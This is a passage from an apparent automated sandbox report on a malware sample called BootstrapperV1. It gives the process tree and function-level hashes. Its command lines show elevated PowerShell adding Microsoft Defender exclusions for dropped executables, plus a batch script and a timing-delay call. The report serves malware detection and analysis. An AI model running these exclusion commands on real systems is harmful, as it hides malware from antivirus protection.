Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	06:52:35
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\RuntimeBroker.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	06:52:36
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	64
Start time:	06:52:36
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	65
Start time:	06:52:36
Start date:	14/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	06:52:36
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	67
Start time:	06:52:36
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	68
Start time:	06:52:36
Start date:	14/09/2024
Path:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
Imagebase:	0x660000
File size:	1'920'000 bytes
MD5 hash:	3C3B7D5864E9F151A77B33D4B9D15E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	69
Start time:	06:52:37
Start date:	14/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.bat"
Imagebase:	0x7ff65bf80000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	06:52:37
Start date:	14/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	06:52:38
Start date:	14/09/2024
Path:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
Imagebase:	0xec0000
File size:	1'920'000 bytes
MD5 hash:	3C3B7D5864E9F151A77B33D4B9D15E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	06:52:40
Start date:	14/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6a4090000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	06:52:40
Start date:	14/09/2024
Path:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
Imagebase:	0xcd0000
File size:	1'920'000 bytes
MD5 hash:	3C3B7D5864E9F151A77B33D4B9D15E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 58%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	78
Start time:	06:52:40
Start date:	14/09/2024
Path:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
Imagebase:	0x760000
File size:	1'920'000 bytes
MD5 hash:	3C3B7D5864E9F151A77B33D4B9D15E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	06:52:51
Start date:	14/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff65fd50000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	80
Start time:	06:52:56
Start date:	14/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	81
Start time:	06:52:59
Start date:	14/09/2024
Path:	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe"
Imagebase:	0xdd0000
File size:	1'920'000 bytes
MD5 hash:	3C3B7D5864E9F151A77B33D4B9D15E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 00007FFD9B811210 Relevance: 2.1, Strings: 1, Instructions: 861COMMON

Download Yara Rule

Strings

\, xrefs: 00007FFD9B811505

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: \
API String ID: 0-2967466578
Opcode ID: 6ada7c2471dbeb01bf3cd8fab526a51c99996781f4c518a4f8858c80c9d38870
Instruction ID: 20e40b67a1b154b6c5cd602acd6b29bb3668e9d8328eecd0cd0ad9febd30db3e
Opcode Fuzzy Hash: 6ada7c2471dbeb01bf3cd8fab526a51c99996781f4c518a4f8858c80c9d38870
Instruction Fuzzy Hash: C2424630B0EA494FE768EB6884A567977D1EF89300F15817ED48FC32E7DD28B8428741

Function 00007FFD9B800E90 Relevance: 1.6, Strings: 1, Instructions: 390COMMON

Download Yara Rule

Strings

4L_^, xrefs: 00007FFD9B801001

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: 4L_^
API String ID: 0-2524838182
Opcode ID: eabac2ad6dcd441c1fa76420fe3f4416764ecb7dd16bd3223a8f947abd65b795
Instruction ID: fefefb4dea55ee1d9688087f3dbc4768b223ce4215c8295d5ed2e7794f2f4e2b
Opcode Fuzzy Hash: eabac2ad6dcd441c1fa76420fe3f4416764ecb7dd16bd3223a8f947abd65b795
Instruction Fuzzy Hash: 86C13932E0D6984FD715EB6CA8A54ED7BF0EF55714B0541BBE0CAC71A3DD14A805C781

Function 00007FFD9B800ED3 Relevance: 1.6, Strings: 1, Instructions: 390COMMON

Download Yara Rule

Strings

4L_^, xrefs: 00007FFD9B801001

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: 4L_^
API String ID: 0-2524838182
Opcode ID: 573c8a3b7aaca9d5769e3f050cfb2d4816b8505d6d3bcc39e6ef57e17ed1f407
Instruction ID: 72cda0bb0cb35f6700190d16012d7f79eeea2b559a0e6ad45bffd5fc0c645d6f
Opcode Fuzzy Hash: 573c8a3b7aaca9d5769e3f050cfb2d4816b8505d6d3bcc39e6ef57e17ed1f407
Instruction Fuzzy Hash: 7EC13932B0D6984FD719EBACA8A54ED7BF0EF59714B0541BBE0CAC71A3DD14A805C782

Function 00007FFD9B800DC8 Relevance: 1.0, Instructions: 952COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43347d27136a7a83e22a28aba8f421bac094657f55a3a69debc0336c88bb46ca
Instruction ID: 586ed66359eb26b9ccf816cc9c1a4253740b299d8c6e9d5562535ab531e725c1
Opcode Fuzzy Hash: 43347d27136a7a83e22a28aba8f421bac094657f55a3a69debc0336c88bb46ca
Instruction Fuzzy Hash: B8628130B1AA4D9FDB98EF5CC865AA937E2FF6C354F0101B9E44DD72A1DA28EC418741

Function 00007FFD9B80C864 Relevance: .6, Instructions: 614COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c079b65a8a560af85362e77b15d157b9aa7e666bf4342362ec678689cdcd2844
Instruction ID: 2910e916a831e9dfb616b7d705e50d128dc86059e65e545116229f7e00990f61
Opcode Fuzzy Hash: c079b65a8a560af85362e77b15d157b9aa7e666bf4342362ec678689cdcd2844
Instruction Fuzzy Hash: 1722253161DB8A8FD369CF2880546E5BBD1FFA9340F0586BED4CA872A2DE34E545CB41

Function 00007FFD9B800E88 Relevance: .5, Instructions: 530COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b420122cf3e4ea680e291511d0ab464f063c33a9d7c84599b2e59dd9ab0b45e1
Instruction ID: 8e2218a4f96fe70067b53b61604acb7981af064088b10d8a0d859bbdcf7194fa
Opcode Fuzzy Hash: b420122cf3e4ea680e291511d0ab464f063c33a9d7c84599b2e59dd9ab0b45e1
Instruction Fuzzy Hash: 3A025C31B0DA494FD769EB2894646FA7BE1EF95310F0582BAD0CDC71E3DE28A845C781

Function 00007FFD9B800CA8 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 589c2e1898d391f75149e57ad9487f26e75d58d34f46d3f5e59d02897ed61420
Instruction ID: 514dc4aff044a9e4cdb07d557278fa2ab6cc9b6db25f2b2345d47b2930748776
Opcode Fuzzy Hash: 589c2e1898d391f75149e57ad9487f26e75d58d34f46d3f5e59d02897ed61420
Instruction Fuzzy Hash: F8C18231B1994D8FDF94EF6CC495AEA3BE1EF6D390B05017AE44DC72A2DA24E9418780

Function 00007FFD9B7F0F48 Relevance: 3.1, Strings: 2, Instructions: 635COMMON

Download Yara Rule

Strings

zL_H, xrefs: 00007FFD9B7FAA73
uL_H, xrefs: 00007FFD9B7FAF73

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: uL_H$zL_H
API String ID: 0-419324264
Opcode ID: 3261d105cd10202075e189c55d49f23464d3041532536e719483e128a7e543a7
Instruction ID: 9216a610bb46034fcff0bb0a9644f468fb0aec721d5cc65c6b02740a0beab81e
Opcode Fuzzy Hash: 3261d105cd10202075e189c55d49f23464d3041532536e719483e128a7e543a7
Instruction Fuzzy Hash: 2312D471B0DA4D4FEB94EF6C88756A93BE2EF98340B1541B9D04DC72B6DE24AC42C784

Function 00007FFD9B7FF1E0 Relevance: 2.9, Strings: 2, Instructions: 360COMMON

Download Yara Rule

Strings

PL_^, xrefs: 00007FFD9B7FF401
QL_^, xrefs: 00007FFD9B7FF301

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: PL_^$QL_^
API String ID: 0-2263931500
Opcode ID: 8afbcc3ec08469a87b729538aedd05fe57c6b4d799ab616283bbebedfe906c00
Instruction ID: f80dca19a6336bbecbd5bd33eb6714ce1a2c1ce3cf5f56923c8cbba12b35796c
Opcode Fuzzy Hash: 8afbcc3ec08469a87b729538aedd05fe57c6b4d799ab616283bbebedfe906c00
Instruction Fuzzy Hash: 62B1171BF0D2A60AD315F7ACB4B68ED3B60DFC123E71982F7D09D890D7DC1864864295

Function 00007FFD9B806240 Relevance: 2.8, Strings: 2, Instructions: 285COMMON

Download Yara Rule

Strings

?R_H, xrefs: 00007FFD9B80640F
H, xrefs: 00007FFD9B8063BF

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: ?R_H$H
API String ID: 0-1647666168
Opcode ID: 6ca5e2dea2803b489056b01eb5fcc26960ed3e6271c326d47fb6eac2005e2155
Instruction ID: bf9f7dc2481b91f0e35b22b0473b8da10b2b3497cf771cf38771ea9dd93ad0e7
Opcode Fuzzy Hash: 6ca5e2dea2803b489056b01eb5fcc26960ed3e6271c326d47fb6eac2005e2155
Instruction Fuzzy Hash: 5A71BB71709D0E0FEBA4EB5C94657F933D1EF99360B0601BAE44DC72A6DE19AD428381

Function 00007FFD9B7F0D80 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

[a, xrefs: 00007FFD9B7F6C1A
[`, xrefs: 00007FFD9B7F6C33, 00007FFD9B7F6C6D

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: [`$[a
API String ID: 0-1202865014
Opcode ID: 0e695f48964b889c9bbb6a6a6e3879d17f2619c8da730f97be1ee124eb970246
Instruction ID: ab9dacd74a7b1f9eabd2151f0bafbcd8969919b53193edbfd6868195c68b1b67
Opcode Fuzzy Hash: 0e695f48964b889c9bbb6a6a6e3879d17f2619c8da730f97be1ee124eb970246
Instruction Fuzzy Hash: 3141A621B1AE5E0FDBB9AA6C44746793AD1EF99600B4502BAD40DC32B6DD19FD01C3C5

Function 00007FFD9B7F6BDD Relevance: 2.6, Strings: 2, Instructions: 103COMMON

Download Yara Rule

Strings

[a, xrefs: 00007FFD9B7F6C1A
[`, xrefs: 00007FFD9B7F6C33, 00007FFD9B7F6C6D

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: [`$[a
API String ID: 0-1202865014
Opcode ID: a4dd6f5ea4dce4c986b6675e5c94252e914ddba0dfd113693fb451fa02c87fa7
Instruction ID: 76de786771c70eba648bd007b84670e4fa2f3d4f6d082f5955ef7407c67d93db
Opcode Fuzzy Hash: a4dd6f5ea4dce4c986b6675e5c94252e914ddba0dfd113693fb451fa02c87fa7
Instruction Fuzzy Hash: 19219120B1AF4E0FD7A9AB6C48746783BD1EF59614B4101BAD40CC32B7DD19AD41C3C4

Function 00007FFD9B800E00 Relevance: 2.6, Strings: 2, Instructions: 71COMMON

Download Yara Rule

Strings

4L_^, xrefs: 00007FFD9B801001
6L_^, xrefs: 00007FFD9B800E01

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: 4L_^$6L_^
API String ID: 0-563004798
Opcode ID: fddfd66d83d5e4ffe0f8ce70bf627c4b58dc6c835e3928a38f9152b10a05a7e4
Instruction ID: 0033c0e928045d2a91f761ed0c6d7260ed0c04004cb2d03b334a11e284789ac6
Opcode Fuzzy Hash: fddfd66d83d5e4ffe0f8ce70bf627c4b58dc6c835e3928a38f9152b10a05a7e4
Instruction Fuzzy Hash: 9901221BB084A607E720B6EDBC364FE7310DF8137B32A81B3C699864839C08744646E2

Function 00007FFD9B7F0F40 Relevance: 1.9, Strings: 1, Instructions: 658COMMON

Download Yara Rule

Strings

O8^L, xrefs: 00007FFD9B7FB3E0

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: O8^L
API String ID: 0-2467913278
Opcode ID: 6aef020cd67d1106722abe6053f698b7825bb08584d41f9941771461b02c743d
Instruction ID: 6218fd1b8238d2661e760ce1d528d5ee6b16f4d6f060ceeb0efdd5ccac1e280c
Opcode Fuzzy Hash: 6aef020cd67d1106722abe6053f698b7825bb08584d41f9941771461b02c743d
Instruction Fuzzy Hash: C322F320B0EA4A4FE759EBA844256B97BD1EF45310F5501BED00ECB2F3DD1CAD828786

Function 00007FFD9B813270 Relevance: 1.7, Strings: 1, Instructions: 434COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B8152AE

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 6c327ff42152186c2e30494562fdb0cc56f5d7580a5244c4d3db590948bdd7fe
Instruction ID: a01c8c96537f7d3073f0d50547a61e74a3d6e95b025c0e4690d81b100a36b77e
Opcode Fuzzy Hash: 6c327ff42152186c2e30494562fdb0cc56f5d7580a5244c4d3db590948bdd7fe
Instruction Fuzzy Hash: 1DD14230B1EB494FD328EB58D4A05B5B3E0FF99304B1546BED08A872A6CE35F8428781

Function 00007FFD9B814F2A Relevance: 1.7, Strings: 1, Instructions: 410COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B8152AE

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: d6d8669ca51529a97151473819fdfad43a7591b24f3f3ba42ccdf0e263547980
Instruction ID: cec1c296502a58942e78707cb06d7fdf5fa0f4d1aac804baa6cd6a7d9f4f4f25
Opcode Fuzzy Hash: d6d8669ca51529a97151473819fdfad43a7591b24f3f3ba42ccdf0e263547980
Instruction Fuzzy Hash: 5DC15630B1EB4A4FD769DB5C8460575B7E1FF9A300B1545BED08AC72A2CE35F9428781

Function 00007FFD9B804CFB Relevance: 1.6, Strings: 1, Instructions: 396COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B80501E

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 5dea0fba227293aef2d472a9b22189f9d91f8efa5958d56ac71e9f5f999cceb6
Instruction ID: 3ed6d00b31ef0fac8fbe085c3eb8e9ded8ed313aa4d0342b92d5a76a60034b27
Opcode Fuzzy Hash: 5dea0fba227293aef2d472a9b22189f9d91f8efa5958d56ac71e9f5f999cceb6
Instruction Fuzzy Hash: 05C12231B0DB494FD729EB5CD4918B9B3E1FF98354B1446BED08A871A6CA31F8438B81

Function 00007FFD9B7F3410 Relevance: 1.6, Strings: 1, Instructions: 387COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B7F419E

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 3337ba7bdc03864627ce70b9d61acea30c2c43abeef89b27ef4db64bcd2f6bdc
Instruction ID: 79b5146cb6549a20de321f5d62024684cd404e7b53e7b84ce714cac4bdf2678e
Opcode Fuzzy Hash: 3337ba7bdc03864627ce70b9d61acea30c2c43abeef89b27ef4db64bcd2f6bdc
Instruction Fuzzy Hash: 9AC11F30B1DB498FE728DB5CD491935BBE1FF98300B1546BDD08AC32A6DA35F9428B85

Function 00007FFD9B7F3E01 Relevance: 1.6, Strings: 1, Instructions: 381COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B7F419E

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 40b1f6ecb4d3440836523b1475dd3eaadd97cdf115372d8496318d6aa39d2067
Instruction ID: 09356f7dfdacf0960346a84aa58d6febc7c5407d31d711b545c4e530fbf806bd
Opcode Fuzzy Hash: 40b1f6ecb4d3440836523b1475dd3eaadd97cdf115372d8496318d6aa39d2067
Instruction Fuzzy Hash: 6CB14530B1DB4A4FD769DB5C8460975BBE1FF94300B1606BED08AC72B6DA35F9028785

Function 00007FFD9B813280 Relevance: 1.6, Strings: 1, Instructions: 356COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B8152AE

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: f5294f09667a7d5ddc4eeb7c2bc90ca33c01e561c96d1ddabb95b2b475e54a8f
Instruction ID: 2d24e98a15bbc0316e02bd9afc3405d4ef13059e8cef0fc65f8c7acbb575d4c1
Opcode Fuzzy Hash: f5294f09667a7d5ddc4eeb7c2bc90ca33c01e561c96d1ddabb95b2b475e54a8f
Instruction Fuzzy Hash: FDB14231B1AB494FD368EB4C94A05B5B3E1FF98304B1546BED08EC72A2CE35F8428780

Function 00007FFD9B8132D3 Relevance: 1.6, Strings: 1, Instructions: 329COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B8152AE

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 9006ea8a7b519c522e9dd0e8b657c84c83c48fcb4796d120cb4166bca811868e
Instruction ID: bc9ef74a659d036f496001308bf509c9390913c0d39765dc312f39137899e9f1
Opcode Fuzzy Hash: 9006ea8a7b519c522e9dd0e8b657c84c83c48fcb4796d120cb4166bca811868e
Instruction Fuzzy Hash: 87A10030B1EB494FD768EB4894605B5B3E1FF99304B1546BED09AC32A6DE35F8428B81

Function 00007FFD9B7FA61F Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

zL_H, xrefs: 00007FFD9B7FAA73

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: zL_H
API String ID: 0-425878393
Opcode ID: 9b13d66e252d51eb6b71ee93e9aeb26c4783835bfe7ebaacd64a8b48dc28a86f
Instruction ID: 52e5b2b3225fac11745fe482605afb5e04871fcbf47b941d5e4caeacd0b4cdfd
Opcode Fuzzy Hash: 9b13d66e252d51eb6b71ee93e9aeb26c4783835bfe7ebaacd64a8b48dc28a86f
Instruction Fuzzy Hash: 2FB1E720B0EB8D5FD7A5DBB884247A9BFE1EF45310F1505BAC04ACB1B2CA6D5D86C781

Function 00007FFD9B813300 Relevance: 1.6, Strings: 1, Instructions: 309COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9B8152AE

Memory Dump Source

Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 3a55ff386329cc0663e49af2f6e404c3e00bd2de7834520884bacd6bdcfecd70
Instruction ID: 33578816aa8e38e385ef1854017b4ffc804b3d92d1bd4efbbf14d0dd9a77ca87
Opcode Fuzzy Hash: 3a55ff386329cc0663e49af2f6e404c3e00bd2de7834520884bacd6bdcfecd70
Instruction Fuzzy Hash: 3391F030B1AB4A4FD778DB48D450975B3E1FFA9300B154A7ED09AC32A6DE35F9428B81

Function 00007FFD9B804AAA Relevance: 1.6, Strings: 1, Instructions: 307COMMON

Download Yara Rule

Strings

[A, xrefs: 00007FFD9B805BA2

Memory Dump Source

